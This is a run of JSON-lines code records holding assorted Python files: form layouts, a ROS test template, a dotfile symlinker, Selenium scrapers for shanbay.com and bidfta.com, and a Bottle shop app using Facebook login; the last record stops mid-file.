\".\"\n self.helper.layout = Layout(\n Fieldset(\n \"Wybierz parametry\",\n formdefaults_html_before(self),\n Row(\n Column(\"od_roku\", css_class=\"large-6 small-6\"),\n Column(\"do_roku\", css_class=\"large-6 small-6\"),\n ),\n Row(Column(\"upowaznienie_pbn\", css_class=\"large-12 small-12\")),\n Row(Column(\"_export\")),\n formdefaults_html_after(self),\n ),\n ButtonHolder(\n Submit(\n \"submit\",\n \"Pobierz raport\",\n css_id=\"id_submit\",\n css_class=\"submit button\",\n ),\n ),\n )\n\n super().__init__(*args, 
**kwargs)\n","sub_path":"src/raport_slotow/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30287634","text":"#!/usr/bin/python\nimport unittest\nimport yaml\nfrom subprocess import call\n\nimport rospy\nimport rostest\nimport rostopic\nfrom atf_recorder import RecordingManager\n\n\nclass AtfApp:\n def __init__(self):\n self.recorder = RecordingManager('testblock_name')\n\n def execute(self):\n # Example for recorder usage\n self.recorder.start()\n self.recorder.error()\n self.recorder.stop()\n\n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.app = AtfApp()\n\n robot_config = self.load_data(rospy.get_param('/robot_config'))\n self.topics = robot_config['wait_for_topics']\n self.services = robot_config['wait_for_services']\n\n def tearDown(self):\n call(\"killall gzclient\", shell=True)\n call(\"killall gzserver\", shell=True)\n\n def test_Recording(self):\n # Wait for topics and services\n for topic in self.topics:\n rospy.wait_for_message(topic, rostopic.get_topic_class(topic, blocking=True)[0], timeout=None)\n\n for service in self.services:\n rospy.wait_for_service(service, timeout=None)\n\n self.app.execute()\n\n @staticmethod\n def load_data(filename):\n rospy.loginfo(\"Reading data from yaml file...\")\n\n with open(filename, 'r') as stream:\n doc = yaml.load(stream)\n\n return doc\n\n\nif __name__ == '__main__':\n rospy.init_node('test_name')\n rostest.rosrun('atf_app', 'test_name', Test, sysargs=None)\n","sub_path":"atf_app_template/scripts/atf_app.py","file_name":"atf_app.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"405939497","text":"#!/usr/bin/env python3\nimport os\n\nclass TargetList:\n zsh = ['zshrc']\n vim = ['vim', 'vimrc', 'gvimrc']\n X = ['mlterm', 'wmii', 'xsession', 'Xresources']\n\n\ndef make_symlink(fname):\n \"\"\" \"\"\"\n src = os.getcwd() + '/' + fname\n dst = os.environ['HOME'] + '/.' 
+ fname\n try:\n os.remove(dst)\n except FileNotFoundError:\n pass\n print(src, '->', dst)\n os.symlink(src, dst)\n\n\nif __name__ == '__main__':\n import sys\n target_list = TargetList()\n tl = []\n for target in sys.argv[1:]:\n tl += getattr(target_list, target)\n for target in tl:\n make_symlink(target)\n","sub_path":".Makefile.py","file_name":".Makefile.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374387223","text":"\"\"\"Provides methods for creating a GUI with Tkinter\"\"\"\nimport tkinter as tk\nfrom PIL import Image, ImageTk\n\nclass Gui:\n def __init__(self, title=\"New Window\"):\n self.root = tk.Tk()\n self.root.title(title)\n\n def size(self, width, height, offsetx=0, offsety=0):\n self.root.geometry(\"{}x{}+{}+{}\".format(width, height,\n offsetx, offsety))\n\n def run(self):\n self.root.mainloop()\n\n def showimage(self, imageurl, _offsetx=0, _offsety=0, resize=True):\n imagetk = ImageTk.PhotoImage(Image.open(imageurl))\n\n width = imagetk.width()\n height = imagetk.height()\n offsetx = _offsetx\n offsety = _offsety\n\n if resize: self.size(width, height, offsetx, offsety)\n\n imagepanel = tk.Label(self.root, image=imagetk)\n imagepanel.pack(side='top', fill='both', expand='yes')\n\n imagepanel.image = imagetk\n","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"590667400","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport time\n\ndriver = webdriver.PhantomJS(executable_path=r'D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # build a headless browser to render JS-loaded content\n\ndriver.get('https://www.shanbay.com/read/news/')\n\ntime.sleep(5) # explicit 5-second delay so the page can finish loading\n\ntry:\n load_more_btn = driver.find_element_by_class_name('loadNewsBtn') # the \"load more\" button\n load_more_btn.click() # click the button\nexcept:\n print('error')\nsoup = BeautifulSoup(driver.page_source,'html.parser')\n# print(driver.page_source)\ntags = soup.find_all('a',attrs={'class':'linkContainer'})\ntime.sleep(5)\nfor i in tags:\n print(i.attrs['href'])\n\n","sub_path":".idea/技巧-Selenium配合PhantonJS解析js数据.py","file_name":"技巧-Selenium配合PhantonJS解析js数据.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"173623401","text":"import string\nimport os\nimport sys\n\nclass PartitionFormatter(string.Formatter):\n def format_field(self, value, spec):\n if spec.startswith('repeat'):\n template = spec.partition(':')[-1]\n if type(value) is dict:\n value = value.items()\n return ''.join([template.format(partitionId=item) for item in value])\n else:\n return super(PartitionFormatter, self).format_field(value, spec)\n\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\ntemplate_file_name = os.path.join(current_dir, './ats-search-index.template.yaml')\noutput_file_name = os.path.join(current_dir, './ats-search-index.generated.yaml')\n\nnum_partitions = int(sys.argv[1])\npartitions = range(1, num_partitions + 1)\n\npartition_formatter = PartitionFormatter()\nwith open(template_file_name, 'r') as template_file:\n template = template_file.read()\n cf_template = partition_formatter.format(template, partitions=partitions)\n with open(output_file_name, 'w') as output_file:\n 
output_file.write(cf_template)\n\n","sub_path":"ats-search-index-generate-template.py","file_name":"ats-search-index-generate-template.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"303118227","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n\n\"\"\"server.py: TODO\"\"\"\n\nimport datetime\nimport math\nimport os\n\nimport bottle as app\nimport rauth\nfrom beaker.middleware import SessionMiddleware\n\nimport config\nimport html\nimport models\n\noauth2 = rauth.OAuth2Service\nfacebook = oauth2(\n client_id=config.FB_APP_ID,\n client_secret=config.FB_APP_SECRET,\n name='facebook',\n authorize_url='https://graph.facebook.com/oauth/authorize',\n access_token_url='https://graph.facebook.com/oauth/access_token',\n base_url='https://graph.facebook.com/'\n)\n\nif config.DEBUG:\n uri_pattern = '{uri}:{port}/success'\nelse:\n uri_pattern = '{uri}/success'\n\nredirect_uri = uri_pattern.format(uri=config.BASE_URI, port=config.PORT)\n\ndef authenticate(func):\n def log_in(*args, **kwargs):\n logged_in = app.request.session.get('logged_in')\n user_id = app.request.session.get('user_id')\n shop_id = app.request.session.get('shop_id')\n\n if logged_in and user_id and shop_id:\n return func(*args, **kwargs)\n\n app.redirect('/login')\n\n return log_in\n\ndef diff_date(time):\n # Awesome snippet from this guy: http://goo.gl/LXQORG\n now = datetime.datetime.now()\n\n if type(time) is int:\n diff = now - datetime.datetime.fromtimestamp(time)\n elif isinstance(time, datetime.datetime):\n diff = now - time\n elif not time:\n diff = now - now\n\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return 'just now'\n if second_diff < 60:\n return str(second_diff) + ' seconds ago'\n if second_diff < 120:\n return 'a minute ago'\n if second_diff < 3600:\n return str( second_diff / 60 ) + ' minutes ago'\n if second_diff < 7200:\n return 'an hour ago'\n if second_diff < 86400:\n return str( second_diff / 3600 ) + ' hours ago'\n\n if day_diff == 1:\n return 'Yesterday'\n if day_diff < 7:\n return str(day_diff) + ' days ago'\n if day_diff < 31:\n return str(day_diff/7) + ' weeks ago'\n if day_diff < 365:\n return str(day_diff/30) + ' months ago'\n\n return str(day_diff/365) + ' years ago'\n\ndef paginator(list_, per_page=10):\n total_count = len(list_)\n pages_count = int(math.ceil(total_count / float(per_page)))\n start_count, end_count = 0, per_page\n pages = [None] # 1st index is None since pagination always starts at 1 not 0\n\n if per_page > total_count:\n end_count = total_count\n\n for i in range(1, pages_count + 1):\n pages.append(list_[start_count:end_count])\n\n if start_count <= total_count:\n start_count += per_page\n\n if end_count <= total_count:\n end_count += per_page\n\n return pages\n\ndef paginator_prev(list_, current_index):\n try:\n if current_index:\n current = list_[current_index]\n previous = list_[current_index-1] or False\n return previous\n except:\n pass\n\n return False\n\ndef paginator_next(list_, current_index):\n try:\n current = list_[current_index]\n next_ = list_[current_index+1]\n return next_\n except:\n return False\n\n@app.hook('before_request')\ndef global_session():\n app.request.session = app.request.environ.get('beaker.session')\n\n reload(html)\n\n@app.get('/')\ndef index(page_num):\n if not page_num:\n page_num = 1\n else:\n page_num = int(page_num.split('/')[1])\n\n if int(page_num) <= 
1:\n app.redirect('/')\n\n pagination_slug = ''\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n diff_date = globals()['diff_date']\n list_types = config.LIST_TYPES\n cdn = config.CDN\n items = (\n models.session.query(models.Item, models.Shop, models.User)\n .join(models.Shop, models.Shop.id == models.Item.shop_id)\n .join(models.User, models.User.id == models.Shop.user_id)\n .order_by(models.Item.id.desc())\n ).all()\n paginated_pages = paginator(items, 10)\n paginated_indexes = range(0, len(paginated_pages))\n paginated_prev = paginator_prev(paginated_indexes, page_num)\n paginated_next = paginator_next(paginated_indexes, page_num)\n return app.template('index', html=html, **locals())\n\n@app.get('/login<:re:/?>')\ndef login():\n app.redirect(\n facebook.get_authorize_url(\n **dict(\n # scope='email,public_profile',\n scope='public_profile',\n response_type='code',\n redirect_uri=redirect_uri\n )\n )\n )\n\n@app.get('/success<:re:/?>')\ndef login_success():\n try:\n code = app.request.params.get('code')\n session = facebook.get_auth_session(\n data=dict(\n code=code,\n redirect_uri=redirect_uri\n )\n )\n session_json = session.get('me').json()\n user_data = (\n dict(\n (k, unicode(v).encode('utf-8'))\n for k, v in session_json.iteritems()\n )\n )\n app.request.session['logged_in'] = True\n app.request.session['user_data'] = user_data\n except:\n return 'An error have occured, please contact the Webmaster.'\n\n user = (\n models.session.query(models.User)\n .filter_by(uid=user_data['id'])\n .first()\n )\n\n if user:\n app.request.session['user_id'] = user.id\n app.request.session['user_slug'] = user.slug\n shop = (\n models.session.query(models.Shop)\n .filter_by(user_id=user.id)\n .first()\n )\n\n if shop:\n app.request.session['shop_id'] = shop.id\n item = (\n models.session.query(models.Item)\n .filter_by(shop_id=shop.id)\n .first()\n )\n\n if not item:\n new_item = models.Item(\n icon_id=909,\n name='Jellopy',\n price='10z',\n trade='Clover or ???',\n amount=1,\n list_type=0,\n created=datetime.datetime.now(),\n shop_id=shop.id\n )\n\n models.session.add(new_item)\n else:\n shop_name = '{name}\\'s Shop'.format(name=user_data['name'])\n server_name = 'My Ragnarok Online'\n new_shop = models.Shop(\n name=shop_name,\n server=server_name,\n ingame='',\n email='',\n mobile='',\n user_id=user.id\n )\n\n models.session.add(new_shop)\n else:\n new_user = models.User(\n uid=user_data['id'],\n email='', # user_data['email'],\n name=user_data['name'],\n slug=user_data['id']\n )\n\n models.session.add(new_user)\n\n models.session.commit()\n app.redirect('/profile')\n\n@app.route('/profile<:re:/?>', method=['POST', 'GET'])\n@authenticate\ndef profile():\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n tab = app.request.query.get('tab')\n valid_tabs = ['shop', 'items', 'settings']\n list_types = config.LIST_TYPES\n cdn = config.CDN\n result = {'type': '', 'title': '', 'message': ''}\n\n if not tab or tab not in valid_tabs:\n app.redirect('/profile?tab=shop')\n\n user_data = app.request.session.get('user_data')\n user_id = app.request.session.get('user_id')\n shop_id = app.request.session.get('shop_id')\n update = app.request.forms.get('update')\n\n # Tab: Shop\n shop = models.session.query(models.Shop).filter_by(id=shop_id).first()\n shop_name = app.request.forms.get('shop_name')\n server = app.request.forms.get('server')\n ingame = app.request.forms.get('ingame')\n email = 
app.request.forms.get('email')\n mobile = app.request.forms.get('mobile')\n\n if shop:\n shop_name = shop_name or shop.name\n server = server or shop.server\n ingame = ingame or shop.ingame\n email = email or shop.email\n mobile = mobile or shop.mobile\n\n # Tab: Items -> New Item\n new_item_list_type = app.request.forms.get('new_item_list_type')\n new_item_icon_id = app.request.forms.get('new_item_icon_id') or ''\n new_item_name = app.request.forms.get('new_item_name') or ''\n new_item_price = app.request.forms.get('new_item_price') or ''\n new_item_trade = app.request.forms.get('new_item_trade') or ''\n new_item_amount = app.request.forms.get('new_item_amount') or 1\n add = app.request.forms.get('add')\n\n # Tab: Items -> Existing Items\n select_all = app.request.query.get('select_all')\n items_selected = app.request.forms.getall('item_selected')\n item_list_types = app.request.forms.getall('item_list_type')\n item_icon_ids = app.request.forms.getall('item_icon_id') or ''\n item_ids = app.request.forms.getall('item_id') or ''\n item_names = app.request.forms.getall('item_name') or ''\n item_prices = app.request.forms.getall('item_price') or ''\n item_trades = app.request.forms.getall('item_trade') or ''\n item_amounts = app.request.forms.getall('item_amount') or ''\n remove = app.request.forms.get('remove')\n\n # Tab: Settings\n user = models.session.query(models.User).filter_by(id=user_id).first()\n slug = app.request.forms.get('slug')\n name = app.request.forms.get('name')\n\n if user:\n name = name or user.name\n slug = slug or user.slug\n user_slug = slug\n\n if update:\n if tab == 'shop':\n result.update(\n type='success',\n title='Congratulations!',\n message='Shop successfully updated.'\n )\n\n shop.name = shop_name\n shop.server = server\n shop.ingame = ingame\n shop.email = email\n shop.mobile = mobile\n elif tab == 'items':\n for i, j in enumerate(item_ids):\n item = models.session.query(models.Item).filter_by(id=j).first()\n\n if not item_names[i]:\n item_names[i] = item.name\n elif int(item_list_types[i]) <= 1 and not item_prices[i]:\n item_prices[i] = item.price\n elif int(item_list_types[i]) == 2 and not item_trades[i]:\n item_trades[i] = item.trade\n elif not item_amounts[i]:\n item_amounts[i] = item.amount\n\n item.icon_id = item_icon_ids[i].strip()\n item.name = item_names[i]\n item.price = item_prices[i]\n item.trade = item_trades[i]\n item.amount = item_amounts[i]\n item.list_type = item_list_types[i]\n item.modified = datetime.datetime.now()\n item.shop_id = shop_id\n\n if not item_ids:\n result.update(\n type='warning',\n title='Failed to update items:',\n message='There is no item to update.'\n )\n else:\n result.update(\n type='success',\n title='Congratulations!',\n message='All items successfully updated.'\n )\n elif tab == 'settings':\n existing_user = (\n models.session.query(models.User)\n .filter(\n models.orm.or_(\n models.User.name == name,\n models.User.slug == slug\n )\n ).first()\n )\n\n if existing_user:\n if existing_user.id != user.id:\n result.update(\n type='error',\n title='Failed to update settings:'\n )\n\n if existing_user.name == name:\n result['message'] = 'Name already exists'\n elif existing_user.slug == slug:\n result['message'] = 'Slug already exists'\n\n if not result['type']:\n result.update(\n type='success',\n title='Congratulations!',\n message='Settings successfully updated.'\n )\n\n user.name = name\n user.slug = slug\n\n if add:\n # Make new_item_list_type to 0 when intentionally modified:\n if new_item_list_type not in ['0', '1', 
'2']:\n new_item_list_type = '0'\n\n if (\n not new_item_name or int(new_item_list_type) <= 1\n and not new_item_price or int(new_item_list_type) == 2\n and not new_item_trade\n ):\n result.update(\n type='error',\n title='Failed to add item:'\n )\n\n if not new_item_name:\n result['message'] = 'Item Name is required.'\n elif int(new_item_list_type) <= 1 and not new_item_price:\n result['message'] = 'Item Price is required.'\n elif int(new_item_list_type) == 2 and not new_item_trade:\n result['message'] = 'Item to Trade is required.'\n else:\n result.update(\n type='success',\n title='Congratulations!',\n message='Item successfully added.'\n )\n new_item = models.Item(\n icon_id=new_item_icon_id.strip(),\n name=new_item_name,\n price=new_item_price,\n trade=new_item_trade,\n amount=new_item_amount,\n list_type=new_item_list_type,\n shop_id=shop_id\n )\n\n models.session.add(new_item)\n\n # Empty fields once successful (except for amount set to 1):\n new_item_icon_id = ''\n new_item_name = ''\n new_item_price = ''\n new_item_trade = ''\n new_item_amount = 1\n\n if remove:\n if not items_selected:\n result.update(\n type='warning',\n title='Failed to remove an item:',\n message='No item was selected.'\n )\n else:\n result.update(\n type='success',\n title='Congratulations!',\n message='Selected items successfully removed.'\n )\n\n for item in items_selected:\n (\n models.session.query(models.Item)\n .filter(models.Item.id == item)\n .filter(models.Item.shop_id == shop_id)\n .delete()\n )\n\n if update or add or remove:\n models.session.commit()\n\n if update and tab == 'settings':\n app.request.session['user_slug'] = slug\n\n tpl = 'profile_{}'.format(tab)\n items = models.session.query(models.Item).filter_by(shop_id=shop_id).all()\n return app.template(tpl, html=html, **locals())\n\n@app.get('/<:re:/?>')\ndef user(slug, page_num):\n if not page_num:\n page_num = 1\n else:\n page_num = int(filter(None, page_num.split('/'))[1])\n\n if int(page_num) <= 1:\n app.redirect('/' + slug)\n\n pagination_slug = '/' + slug\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n diff_date = globals()['diff_date']\n list_types = config.LIST_TYPES\n cdn = config.CDN\n user = (\n models.session.query(models.User)\n .filter_by(slug=slug)\n .join(models.Shop)\n .join(models.Item)\n .first()\n )\n\n if not user:\n app.abort(404)\n\n paginated_pages = paginator(user.shop.items, 10)\n paginated_indexes = range(0, len(paginated_pages))\n paginated_prev = paginator_prev(paginated_indexes, page_num)\n paginated_next = paginator_next(paginated_indexes, page_num)\n\n return app.template('user', html=html, **locals())\n\n@app.get('/favicon.ico')\ndef favicon():\n root = os.path.join(os.path.dirname(__file__), 'static')\n return app.static_file('favicon.ico', root=root)\n\n@app.get('/logout')\ndef logout():\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n\n app.request.session.delete()\n app.redirect('/')\n\n@app.get('/<path>/<file_>')\ndef static(path, file_):\n root = os.path.join(os.path.dirname(__file__), 'static')\n return app.static_file(file_, root=root + '/' + path)\n\n@app.error(404)\n@app.error(500)\ndef page_404(error):\n logged_in = app.request.session.get('logged_in')\n user_slug = app.request.session.get('user_slug')\n return app.template('404', html=html, **locals())\n\napp.run(\n server=config.SERVER,\n host=config.HOST,\n port=config.PORT,\n debug=config.DEBUG,\n reloader=config.RELOADER,\n 
app=SessionMiddleware(app.app(), {\n 'session.data_dir': config.SESSION,\n 'session.type': config.SESSION_TYPE,\n 'session.auto': config.SESSION_AUTO\n })\n)\n","sub_path":"py/ragnashop/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"119327741","text":"# Store the admission prices as constants\r\nBABY_PRICE = 0.00\r\nCHILD_PRICE = 14.00\r\nADULT_PRICE = 23.00\r\nSENIOR_PRICE = 18.00\r\n\r\n\r\n# Store the age limits as constants\r\nBABY_LIMIT = 2\r\nCHILD_LIMIT = 12\r\nADULT_LIMIT = 64\r\n\r\n# Create a variable to hold the total admission cost for all guests in a group\r\ntotal = 0\r\n\r\n# Keep on reading ages until the user enters a blank line\r\nline = input(\"Enter the age of the guest (blank to finish): \")\r\nwhile line != \"\":\r\n age = int(line)\r\n\r\n\r\n # Add the correct amount to the total\r\n if age <= BABY_LIMIT:\r\n total = total + BABY_PRICE\r\n elif age <= CHILD_LIMIT:\r\n total = total + CHILD_PRICE\r\n elif age <= ADULT_LIMIT:\r\n total = total + ADULT_PRICE\r\n else:\r\n total = total + SENIOR_PRICE\r\n\r\n # Read the next line from the user\r\n line = input(\"Enter the age for the guest (blank to finish): \")\r\n\r\n# Display the total due for the group formatted using two decimal places\r\nprint(\"The total for that group is £%.2f\" % total)\r\n \r\n","sub_path":"AdmissionPrice.py","file_name":"AdmissionPrice.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"607432700","text":"from PageObject.basepage import BasePage\nfrom time import sleep\n\n\nclass SendEmailPage(BasePage):\n \"\"\"写信Page\"\"\"\n def write_button(self):\n # 点击写信\n sleep(2)\n el_wl = self.by_xpath(\"//span[text() = '写 信']/parent::li\")\n el_wl.click()\n\n def write_letter(self, email, topic, text):\n # 编辑信件\n sleep(2)\n if email:\n el_mail = self.by_xpath(\"//*[@title = '发给多人时地址请以分号隔开']/child::div/input\")\n el_mail.send_keys(email)\n if topic:\n el_topic = self.by_xpath(\"//*[@aria-label = '邮件主题输入框,请输入邮件主题']/child::input\")\n el_topic.send_keys(topic)\n # 进入编辑正文表单\n text_iframe = self.by_class(\"APP-editor-iframe\")\n self.driver.switch_to.frame(text_iframe)\n if text:\n el_text = self.by_xpath(\"//*[text() = '编辑邮件正文']/ancestor::html/child::body\")\n el_text.send_keys(text)\n\n def send_button(self):\n # 点击发送\n sleep(2)\n # 回到最外层页面\n self.driver.switch_to.default_content()\n el_send = self.by_xpath(\"//span[text() = '发送']\")\n el_send.click()\n","sub_path":"PageObject/sendemailpage.py","file_name":"sendemailpage.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"221739927","text":"# coding: utf-8\nfrom utils import CSVScraper\n\n\nclass OttawaPersonScraper(CSVScraper):\n csv_url = 'http://data.ottawa.ca/en/dataset/fd26ae83-fe1a-40d8-8951-72df40021c82/resource/33a437d3-a06d-4c56-a7fe-4fd622364ce6/download/elected-officials-282014-201829-v.2.csv'\n corrections = {\n 'district name': {\n \"Orl\\u0082ans\": 'Orléans',\n },\n }\n","sub_path":"ca_on_ottawa/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632341270","text":"from bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import 
Options\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nimport urllib.request\r\nimport time\r\nimport pandas as pd\r\nimport database\r\n\r\n#Debug\r\nimport time\r\n\r\n#Define\r\nbid_fta_all_auctions = 'https://www.bidfta.com/home'\r\n\r\ndef change_page(driver,wait,page_num):\r\n\tpage_input = driver.find_element_by_id(\"pageInput\")\r\n\tpage_input.send_keys(page_num)\r\n\t\r\n\t#Click Go button\r\n\tgo_button = driver.find_element_by_id(\"pagebtn\")\r\n\tgo_button.click()\r\n\r\n\t#Wait for loading overlay\r\n\tloadingOverlay = driver.find_element_by_class_name(\"overlay\")\r\n\twait.until(EC.invisibility_of_element_located(loadingOverlay))\r\n\ttime.sleep(.5)\r\n\r\ndef clean_up(driver):\r\n\tdriver.quit()\r\n\r\ndef filter_auctions_by_warehouse_city(driver,wait,bid_fta_all_auctions,city,state):\r\n\t#Open the Webpage\r\n\tdriver.get(bid_fta_all_auctions)\r\n\r\n\t#Expand the warehouse location dropdown\r\n\tclickable_warehouse_dropdown = driver.find_element_by_xpath(\"//*[@class='multiselect dropdown-toggle btn btn-default']\")\r\n\tclickable_warehouse_dropdown.click()\r\n\r\n\t#Find all the dropdown options\r\n\twarehouse_dropdown = driver.find_element_by_xpath(\"//*[@class='multiselect-container dropdown-menu']\")\r\n\r\n\t#Expand the state\r\n\t#warehouse_states = warehouse_dropdown.find_elements_by_xpath(\"//*[@class='multiselect-item multiselect-group']\")\r\n\twarehouse_states = warehouse_dropdown.find_elements_by_tag_name(\"li\")\r\n\r\n\t#Loop through the states for any containing the state of interest and expand them\r\n\tfor warehouse_state in warehouse_states:\r\n\t\twarehouse_state_name = warehouse_state.text\r\n\t\tif state in warehouse_state_name:\r\n\t\t\twarehouse_state_caret = warehouse_state.find_element_by_class_name(\"caret-container\")\r\n\t\t\twarehouse_state_caret.click()\r\n\t\t\tbreak\r\n\t\t\t#Will delete below, current design dictates a new browser session is always opened.\r\n\t\t\t#Checks that the warehouse location isnt already selected since we dont want it to de-select it\r\n\t\t\t#warehouse_state_checkbox = warehouse_state.get_attribute()\r\n\t\t\t#if \"active\" not in warehouse_state_checkbox:\r\n\t\t\t#\twarehouse_state.click()\r\n\r\n\t#Find the City\r\n\twarehouses = warehouse_dropdown.find_elements_by_tag_name(\"a\")\r\n\r\n\t#Loop through the warehouse locations for any containing the city of interest and select them\r\n\tfor warehouse in warehouses:\r\n\t\twarehouse_location = warehouse.find_elements_by_class_name(\"checkbox\")\r\n\t\tif len(warehouse_location) > 0:\r\n\t\t\twarehouse_location_name = warehouse_location[0].get_attribute(\"title\")\r\n\t\t\tif city in warehouse_location_name:\r\n\t\t\t\t#Checks that the warehouse location isnt already selected since we dont want it to de-select it\r\n\t\t\t\twarehouse_location_classes = warehouse.get_attribute(\"class\")\r\n\t\t\t\tif \"active\" not in warehouse_location_classes:\r\n\t\t\t\t\twarehouse.click()\r\n\t\t\r\n\t#Click the filter button\r\n\tfilter_button = driver.find_element_by_xpath(\"//*[@class='btn btn-lg btn-style filter-btn']\")\r\n\tfilter_button.click()\r\n\r\n\t#Wait for loading overlay\r\n\tloadingOverlay = 
driver.find_element_by_class_name(\"overlay\")\r\n\twait.until(EC.invisibility_of_element_located(loadingOverlay))\r\n\ttime.sleep(1)\r\n\r\ndef get_all_auctions_on_page (driver,wait):\r\n\t#Print all auction results on page bidfta.com/home\r\n\tauction_dictionary = {}\r\n\tauction_details = []\r\n\tall_auctions = driver.find_elements_by_xpath(\"//div[starts-with(@id,'auctionContainer')]\")\r\n\r\n\t#Record details for each auction\r\n\tfor each_auction in all_auctions:\r\n\t\tauction_id = each_auction.find_element_by_xpath(\".//p[starts-with(text(),'Auction:')]\").text.split(': ')[1]\r\n\t\tauction_end = each_auction.find_element_by_xpath(\".//div[contains(@class,'endTime')]\").text\r\n\t\tauction_time_remaining = each_auction.find_element_by_xpath(\".//span[starts-with(@id,'time')]\").text\r\n\t\tauction_link = each_auction.find_element_by_xpath(\".//a[starts-with(@href,'/auctionDetails')]\").get_attribute(\"href\")\r\n\t\tauction_details = [auction_end,auction_time_remaining,auction_link]\r\n\t\tauction_dictionary[auction_id] = auction_details\r\n\r\n\treturn auction_dictionary\r\n\t\r\ndef get_total_pages (driver,wait):\r\n\t#total_pages = driver.find_element_by_xpath(\"//span[@class='total total_page']\")\r\n\ttotal_pages = wait.until(EC.presence_of_element_located((By.XPATH, \"//span[@class='total total_page']\")))\r\n\r\n\treturn int(total_pages.text)\r\n\r\ndef navigate_to_auction_items_by_auction_id(driver,auction_id,auction_dictionary):\r\n\t#Get auction dictionary items\r\n\tauction_details = auction_dictionary.get(auction_id)\r\n\tauction_link = auction_details[2]\r\n\tauction_link_num = auction_link[-5:]\r\n\tauction_items_link = \"https://www.bidfta.com/auctionItems?listView=true&idauctions=\" + auction_link_num + \"&pageId=1\"\r\n\tdriver.get(auction_items_link)\r\n\r\ndef get_all_items_on_page(driver,wait_halfsec):\r\n\titem_dictionary = {}\r\n\titem_details = []\r\n\tall_items_on_page = driver.find_elements_by_xpath(\"//div[starts-with(@id,'itemContainer')]\")\r\n\r\n\t#Record details for each auction\r\n\tfor each_item in all_items_on_page:\r\n\t\t#Find the item details we are interested in\r\n\t\titem_lot_id = each_item.find_element_by_xpath(\".//span[starts-with(@id,'lotcode')]\").text\r\n\t\titem_description = each_item.find_element_by_xpath(\".//p[contains(@class,'title')]\").text\r\n\t\titem_status = each_item.find_element_by_xpath(\".//p[contains(@class,'itemStatus')]\").text\r\n\t\titem_current_bid = each_item.find_element_by_xpath(\".//span[starts-with(@id,'currentBid')]\").text.split('$')[1]\r\n\t\twait_halfsec = WebDriverWait(each_item, .5)\r\n\t\ttry:\r\n\t\t\titem_msrp_raw = wait_halfsec.until(EC.presence_of_element_located((By.XPATH, \".//div[contains(@class,'text-right')]\"))).text\r\n\t\t\tif item_msrp_raw:\r\n\t\t\t\titem_msrp = item_msrp_raw.split('$ ')[1]\r\n\t\t\telse:\r\n\t\t\t\titem_msrp = None\r\n\t\t\t#print(item_msrp)\r\n\t\texcept:\r\n\t\t\tprint(\"no msrp container\")\r\n\t\titem_msrp = None\r\n\t\titem_link = each_item.find_element_by_xpath(\".//a[starts-with(@href,'/itemDetails')]\").get_attribute(\"href\")\r\n\r\n\t\t#Use the lot_id as a key and the rest of the details as values\r\n\t\titem_details = [item_description,item_status,item_current_bid,item_msrp,item_link]\r\n\t\titem_dictionary[item_lot_id] = item_details\r\n\r\n\treturn item_dictionary\r\n\r\ndef get_all_items_by_auction_id(driver,wait5,wait_halfsec,auction_id,auction_dictionary):\r\n\t#Navigate to item page for a specific 
